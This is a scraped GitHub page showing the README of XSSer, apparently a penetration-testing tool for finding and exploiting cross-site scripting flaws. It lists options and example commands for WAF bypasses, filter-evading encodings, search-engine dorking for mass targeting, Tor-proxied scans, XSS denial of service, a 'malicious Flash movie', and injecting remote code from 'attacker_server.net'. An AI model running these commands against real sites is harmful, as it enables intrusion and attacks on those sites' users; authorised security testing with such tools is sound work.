xsser/doc at master · fakegit/xsser

{"payload":{"allShortcutsEnabled":false,"path":"doc","repo":{"id":155958620,"defaultBranch":"master","name":"xsser","ownerLogin":"fakegit","currentUserCanPush":false,"isFork":true,"isEmpty":false,"createdAt":"2018-11-03T06:56:01.000Z","ownerAvatar":"https://avatars.githubusercontent.com/u/1928984?v=4","public":true,"private":false,"isOrgOwned":false},"currentUser":null,"refInfo":{"name":"master","listCacheKey":"v0:1616337554.922379","canEdit":false,"refType":"branch","currentOid":"d849e340fd5b31bb11a7deae9dcee6281768660c"},"tree":{"items":[{"name":"AUTHOR","path":"doc/AUTHOR","contentType":"file"},{"name":"CHANGELOG","path":"doc/CHANGELOG","contentType":"file"},{"name":"COMMITMENT","path":"doc/COMMITMENT","contentType":"file"},{"name":"COPYING","path":"doc/COPYING","contentType":"file"},{"name":"INSTALL","path":"doc/INSTALL","contentType":"file"},{"name":"MANIFESTO","path":"doc/MANIFESTO","contentType":"file"},{"name":"README","path":"doc/README","contentType":"file"},{"name":"requirements.txt","path":"doc/requirements.txt","contentType":"file"}],"templateDirectorySuggestionUrl":null,"readme":{"displayName":"README","richText":"\u003cdiv class=\"plain\"\u003e\u003cpre style=\"white-space: pre-wrap\"\u003e================================================================\nIntroduction:\n==============================\n\nCross Site \"Scripter\" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.\n\n================================================================\nCurrent Version:\n==============================\n\nXSSer v1.8[4]: \"The Hiv€!\" (2010/2021) // [\u003ca href=\"https://xsser.03c8.net\" rel=\"nofollow\"\u003ehttps://xsser.03c8.net\u003c/a\u003e]\n\n================================================================\nOptions and features:\n==============================\n \nUsage: \n\nxsser [OPTIONS] [--all \u0026lt;url\u0026gt; |-u \u0026lt;url\u0026gt; |-i \u0026lt;file\u0026gt; |-d \u0026lt;dork\u0026gt; (options)|-l ] [-g \u0026lt;get\u0026gt; |-p \u0026lt;post\u0026gt; |-c \u0026lt;crawl\u0026gt; (options)]\n[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}\n\nCross Site \"Scripter\" is an automatic -framework- to detect, exploit and\nreport XSS vulnerabilities in web-based applications.\n\nOptions:\n --version show program's version number and exit\n -h, --help show this help message and exit\n -s, --statistics show advanced statistics output results\n -v, --verbose active verbose mode output results\n --gtk launch XSSer GTK Interface\n --wizard start Wizard Helper!\n\n *Special Features*:\n You can set Vector(s) and Bypasser(s) to build complex scripts for XSS\n code embedded. XST allows you to discover if target is vulnerable to\n 'Cross Site Tracing' [CAPEC-107]:\n\n --imx=IMX IMX - Create an image with XSS (--imx image.png)\n --fla=FLASH FLA - Create a flash movie with XSS (--fla movie.swf)\n --xst=XST XST - Cross Site Tracing (--xst http(s)://host.com)\n\n *Select Target(s)*:\n At least one of these options must to be specified to set the source\n to get target(s) urls from:\n\n --all=TARGET Automatically audit an entire target\n -u URL, --url=URL Enter target to audit\n -i READFILE Read target(s) urls from file\n -d DORK Search target(s) using a query (ex: 'news.php?id=')\n -l Search from a list of 'dorks'\n --De=DORK_ENGINE Use this search engine (default: DuckDuckGo)\n --Da Search massively using all search engines\n\n *Select type of HTTP/HTTPS Connection(s)*:\n These options can be used to specify which parameter(s) we want to use\n as payload(s). Set 'XSS' as keyword on the place(s) that you want to\n inject:\n\n -g GETDATA Send payload using GET (ex: '/menu.php?id=XSS')\n -p POSTDATA Send payload using POST (ex: 'foo=1\u0026amp;bar=XSS')\n -c CRAWLING Number of urls to crawl on target(s): 1-99999\n --Cw=CRAWLER_WIDTH Deeping level of crawler: 1-5 (default: 2)\n --Cl Crawl only local target(s) urls (default: FALSE)\n\n *Configure Request(s)*:\n These options can be used to specify how to connect to the target(s)\n payload(s). You can choose multiple:\n\n --head Send a HEAD request before start a test\n --cookie=COOKIE Change your HTTP Cookie header\n --drop-cookie Ignore Set-Cookie header from response\n --user-agent=AGENT Change your HTTP User-Agent header (default: SPOOFED)\n --referer=REFERER Use another HTTP Referer header (default: NONE)\n --xforw Set your HTTP X-Forwarded-For with random IP values\n --xclient Set your HTTP X-Client-IP with random IP values\n --headers=HEADERS Extra HTTP headers newline separated\n --auth-type=ATYPE HTTP Authentication type (Basic, Digest, GSS or NTLM)\n --auth-cred=ACRED HTTP Authentication credentials (name:password)\n --check-tor Check to see if Tor is used properly\n --proxy=PROXY Use proxy server (tor: http://localhost:8118)\n --ignore-proxy Ignore system default HTTP proxy\n --timeout=TIMEOUT Select your timeout (default: 30)\n --retries=RETRIES Retries when connection timeout (default: 1)\n --threads=THREADS Maximum number of concurrent requests (default: 5)\n --delay=DELAY Delay in seconds between each request (default: 0)\n --tcp-nodelay Use the TCP_NODELAY option\n --follow-redirects Follow server redirection responses (302)\n --follow-limit=FLI Set limit for redirection requests (default: 50)\n\n *Checker Systems*:\n These options are useful to know if your target is using filters\n against XSS attacks:\n\n --hash Send a hash to check if target is repeating content\n --heuristic Discover parameters filtered by using heuristics\n --discode=DISCODE Set code on reply to discard an injection\n --checkaturl=ALT Check reply using: \u0026lt;alternative url\u0026gt; [aka BLIND-XSS]\n --checkmethod=ALTM Check reply using: GET or POST (default: GET)\n --checkatdata=ALD Check reply using: \u0026lt;alternative payload\u0026gt;\n --reverse-check Establish a reverse connection from target to XSSer\n\n *Select Vector(s)*:\n These options can be used to specify injection(s) code. Important if\n you don't want to inject a common XSS vector used by default. Choose\n only one option:\n\n --payload=SCRIPT OWN - Inject your own code\n --auto AUTO - Inject a list of vectors provided by XSSer\n\n *Select Payload(s)*:\n These options can be used to set the list of vectors provided by\n XSSer. Choose only if required:\n\n --auto-set=FZZ_NUM ASET - Limit of vectors to inject (default: 1293)\n --auto-info AINFO - Select ONLY vectors with INFO (default: FALSE)\n --auto-random ARAND - Set random to order (default: FALSE)\n\n *Anti-antiXSS Firewall rules*:\n These options can be used to try to bypass specific WAF/IDS products\n and some anti-XSS browser filters. Choose only if required:\n\n --Phpids0.6.5 PHPIDS (0.6.5) [ALL]\n --Phpids0.7 PHPIDS (0.7) [ALL]\n --Imperva Imperva Incapsula [ALL]\n --Webknight WebKnight (4.1) [Chrome]\n --F5bigip F5 Big IP [Chrome + FF + Opera]\n --Barracuda Barracuda WAF [ALL]\n --Modsec Mod-Security [ALL]\n --Quickdefense QuickDefense [Chrome]\n --Sucuri SucuriWAF [ALL]\n --Firefox Firefox 12 [\u0026amp; below]\n --Chrome Chrome 19 \u0026amp; Firefox 12 [\u0026amp; below]\n --Opera Opera 10.5 [\u0026amp; below]\n --Iexplorer IExplorer 9 \u0026amp; Firefox 12 [\u0026amp; below]\n\n *Select Bypasser(s)*:\n These options can be used to encode vector(s) and try to bypass\n possible anti-XSS filters. They can be combined with other techniques:\n\n --Str Use method String.FromCharCode()\n --Une Use Unescape() function\n --Mix Mix String.FromCharCode() and Unescape()\n --Dec Use Decimal encoding\n --Hex Use Hexadecimal encoding\n --Hes Use Hexadecimal encoding with semicolons\n --Dwo Encode IP addresses with DWORD\n --Doo Encode IP addresses with Octal\n --Cem=CEM Set different 'Character Encoding Mutations'\n (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')\n\n *Special Technique(s)*:\n These options can be used to inject code using different XSS\n techniques and fuzzing vectors. You can choose multiple:\n\n --Coo COO - Cross Site Scripting Cookie injection\n --Xsa XSA - Cross Site Agent Scripting\n --Xsr XSR - Cross Site Referer Scripting\n --Dcp DCP - Data Control Protocol injections\n --Dom DOM - Document Object Model injections\n --Ind IND - HTTP Response Splitting Induced code\n\n *Select Final injection(s)*:\n These options can be used to specify the final code to inject on\n vulnerable target(s). Important if you want to exploit 'on-the-wild'\n the vulnerabilities found. Choose only one option:\n\n --Fp=FINALPAYLOAD OWN - Exploit your own code\n --Fr=FINALREMOTE REMOTE - Exploit a script -remotely-\n\n *Special Final injection(s)*:\n These options can be used to execute some 'special' injection(s) on\n vulnerable target(s). You can select multiple and combine them with\n your final code (except with DCP exploits):\n\n --Anchor ANC - Use 'Anchor Stealth' payloader (DOM shadows!)\n --B64 B64 - Base64 code encoding in META tag (rfc2397)\n --Onm ONM - Use onMouseMove() event\n --Ifr IFR - Use \u0026lt;iframe\u0026gt; source tag\n --Dos DOS - XSS (client) Denial of Service\n --Doss DOSs - XSS (server) Denial of Service\n\n *Reporting*:\n --save Export to file (XSSreport.raw)\n --xml=FILEXML Export to XML (--xml file.xml)\n\n *Miscellaneous*:\n --silent Inhibit console output results\n --alive=ISALIVE Set limit of errors before check if target is alive\n --update Check for latest stable version\n\n================================================================\nCommands and examples:\n==============================\n\n---------------------------------------\n\n* View HELP (Available commands):\n \n xsser -h (--help)\n\n----------------------------------------\n\n* Check for latest stable version:\n\n xsser --update\n\n----------------------------------------\n\n* Launch GTK interface (GUI):\n\n xsser --gtk\n\n----------------------------------------\n\n* Simple injection from URL:\n\n xsser -u \"\u003ca href=\"https://target.com/XSS\" rel=\"nofollow\"\u003ehttps://target.com/XSS\u003c/a\u003e\"\n\n----------------------------------------\n\n* Simple injection from File, with Tor proxy and spoofing HTTP Referer headers\n\n xsser -i \"file.txt\" --proxy \"\u003ca href=\"http://127.0.0.1:8118\" rel=\"nofollow\"\u003ehttp://127.0.0.1:8118\u003c/a\u003e\" --referer \"127.0.0.1\"\n\n----------------------------------------\n\n* Multiple injections from URL, with automatic payloading, establishing a reverse connection and showing statistics:\n\n xsser -u \"https:/target.com/XSS\" --auto --reverse-check -s\n\n----------------------------------------\n\n* Multiple injections from URL, with automatic payloading, using Tor proxy, using \"Hexadecimal\" encoding, with verbose output and saving results to file (XSSreport.raw):\n\n xsser -u \"\u003ca href=\"https://target.com/XSS\" rel=\"nofollow\"\u003ehttps://target.com/XSS\u003c/a\u003e\" --auto --proxy \"\u003ca href=\"http://127.0.0.1:8118\" rel=\"nofollow\"\u003ehttp://127.0.0.1:8118\u003c/a\u003e\" --Hex --verbose --save\n\n----------------------------------------\n\n* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, changing payload to 'Hexadecimal'; second, changing to 'StringFromCharCode' the first one; third, reencoding to 'Hexadecimal' the second one), with HTTP User-Agent spoofed, changing timeout to \"20\" and using multithreads (5 threads):\n\n xsser -u \"\u003ca href=\"https://target.com/XSS\" rel=\"nofollow\"\u003ehttps://target.com/XSS\u003c/a\u003e\" --auto --Cem \"Hex,Str,Hex\" --user-agent \"XSSer Pentesting Tool\" --timeout \"20\" --threads \"5\"\n\n----------------------------------------\n\n* Advanced injection from File, payloading your -own- code and using Unescape() character encoding to bypass filters:\n\n xsser -i \"urls.txt\" --payload \"\u0026lt;script\u0026gt;alert('XSSed');\u0026lt;/script\u0026gt;\" --Une\n\n----------------------------------------\n\n* Injection from Dork, selecting \"DuckDuckGo\" as search engine:\n\n xsser --De \"duck\" -d \"search.php?q=\"\n\n----------------------------------------\n\n* Injection from a list of Dorks extracted from a file (provided by XSSer) and using all search engines supported (XSSer Storm!):\n\n xsser -l --Da \n\n----------------------------------------\n\n* Injection from Crawler with deep 2 and 200 pages to review (XSSer Spider!):\n\n xsser -c 200 --Cw=2 -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\"\n\n----------------------------------------\n\n* Simple injection from URL, to a POST parameter (ex: password), with statistics results:\n\n xsser -u \"\u003ca href=\"https://target.com/login.php\" rel=\"nofollow\"\u003ehttps://target.com/login.php\u003c/a\u003e\" -p \"username=admin\u0026amp;password=XSS\" -s\n\n----------------------------------------\n\n* Multiple injections (with hex and int hashes) to multiple parameters on a single URLG and using GET:\n\n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" -g \"login.php?=usernameXSS\u0026amp;password=XSS\u0026amp;captcha=X1S\" --auto\n\n----------------------------------------\n\n* Simple injection from URL, using GET, injecting on Cookie, trying to use DOM shadow space (no server logging!) and if exists any vulnerability, exploiting your -own- final code:\n\n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" -g \"/news.asp?page=XSS\" --Coo --Anchor --Fp=\"\u0026lt;script\u0026gt;alert('XSSed');\u0026lt;/script\u0026gt;\"\n\n----------------------------------------\n\n* Simple injection from URL, using GET and if exists any vulnerability, exploit a DoS (Denegation Of Service):\n\n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" -g \"/news.asp?page=XSS\" --Dos\n\n----------------------------------------\n\n* Multiple injections to multiple places, extracting targets from a File, applying automatic payloading, changing timeout to \"20\" and using multithreads (5 threads), increasing delay between requests to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and Cookies, using proxy Tor, with IP Octal obfuscation, with statistics results and using verbose mode (real player mode!): \n\n xsser -i \"list_of_url_targets.txt\" --auto --timeout \"20\" --threads \"5\" --delay \"10\" --Xsa --Xsr --Coo --proxy \"\u003ca href=\"http://127.0.0.1:8118\" rel=\"nofollow\"\u003ehttp://127.0.0.1:8118\u003c/a\u003e\" --Doo -s --verbose \n\n----------------------------------------\n\n* Injection of a XSS code provided by user on a -fake- image (ready to be uploaded to your public profile):\u0026lt;br\u0026gt;\u0026lt;br\u0026gt;\n\n xsser --Imx \"test.png\" --payload=\"\u0026lt;script\u0026gt;alert('XSSed');\u0026lt;/script\u0026gt;\"\n\n----------------------------------------\n\n* Report dorking search (using all search engines) to a XML file:\n\n xsser -d \"login.php\" --Da --xml \"security_report_XSSer_Dork_login-php_allengines.xml\" \n\n----------------------------------------\n\n* Create a malicious Flash movie :\n\n xsser --fla \"INFECTED_movie.swf\"\n\n----------------------------------------\n\n* Send a pre-checking hash to search for false -false positives-:\n\n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" --hash\n\n----------------------------------------\n\n* Discover parameters filtered on your target using heuristics:\n\n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" --heuristic\n\n----------------------------------------\n\n* Exploiting Base64 code encoding in META tag (rfc2397), just after inject a manual payload:\n \n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" -g \"/index.php?id=XSS\" --payload=\"\u0026lt;script\u0026gt;alert('XSSed');\u0026lt;/script\u0026gt;\" --B64\n\n----------------------------------------\n\n* Exploiting your \"own\" -remote code- after discover a vulnerability using automatic fuzzing:\u0026lt;br\u0026gt;\u0026lt;br\u0026gt;\n \n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" -g \"/index.php?id=XSS\" --auto --Fr \"https://attacker_server.net/exploits/XSS/code.js\"\u0026lt;/b\u0026gt;\u0026lt;br\u0026gt;\n\n----------------------------------------\n\n* Apply Anti-antiXSS bypassers (ex: Imperva) before to inject you -own- code with verbose output:\n\n xsser -u \"\u003ca href=\"https://target.com\" rel=\"nofollow\"\u003ehttps://target.com\u003c/a\u003e\" -g \"/index.php?id=XSS\" --Imperva --payload=\"\u0026lt;script\u0026gt;alert('XSSed');\u0026lt;/script\u0026gt;\" -v\n\n----------------------------------------\n\n* Search also \"XSSer\" on the Internet for more videos and tutorials...\n\n [...]\n\n\u003c/pre\u003e\u003c/div\u003e","errorMessage":null,"headerInfo":{"toc":[],"siteNavLoginPath":"/login?return_to=https%3A%2F%2Fgithub.com%2Ffakegit%2Fxsser%2Ftree%2Fmaster%2Fdoc"}},"totalCount":8,"showBranchInfobar":true},"fileTree":{"":{"items":[{"name":".github","path":".github","contentType":"directory"},{"name":"core","path":"core","contentType":"directory"},{"name":"doc","path":"doc","contentType":"directory"},{"name":"gtk","path":"gtk","contentType":"directory"},{"name":".gitattributes","path":".gitattributes","contentType":"file"},{"name":".gitignore","path":".gitignore","contentType":"file"},{"name":".pylintrc","path":".pylintrc","contentType":"file"},{"name":"Makefile","path":"Makefile","contentType":"file"},{"name":"README.md","path":"README.md","contentType":"file"},{"name":"setup.py","path":"setup.py","contentType":"file"},{"name":"xsser","path":"xsser","contentType":"file"}],"totalCount":11}},"fileTreeProcessingTime":1.598875,"foldersToFetch":[],"treeExpanded":true,"symbolsExpanded":false,"csrf_tokens":{"/fakegit/xsser/branches":{"post":"wQsvmY6G3K7yYtzX5uYt2o3DA7UE0HEw7KZJ34Lf7RPU9ncSk0TgoKlQuCJN3JhTJSW7nsocp3xJfqFL2e_8hA"},"/fakegit/xsser/branches/fetch_and_merge/master":{"post":"Nx13wYvuFghOJFYhNflJn098rWqPr4e7SOTyZSbLZ7yrFU8ZVmW-oITjZ2bv2c6WgFYpedvO4o_LVRIQlbAOlA"},"/fakegit/xsser/branches/fetch_and_merge/master?discard_changes=true":{"post":"KhEkQmT16WCD1ijlAXqVikEVRlmPaY39sfenJls-cRK2GRyauX5ByEkRGaLbWhKDjj_CStsI6MkyRkdT6EUYOg"}}},"title":"xsser/doc at master · fakegit/xsser","appPayload":{"helpUrl":"https://docs.github.com","findFileWorkerPath":"/assets-cdn/worker/find-file-worker-263cab1760dd.js","findInFileWorkerPath":"/assets-cdn/worker/find-in-file-worker-98e6e9db3609.js","githubDevUrl":null,"enabled_features":{"code_nav_ui_events":false,"react_blob_overlay":false,"accessible_code_button":true}}}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!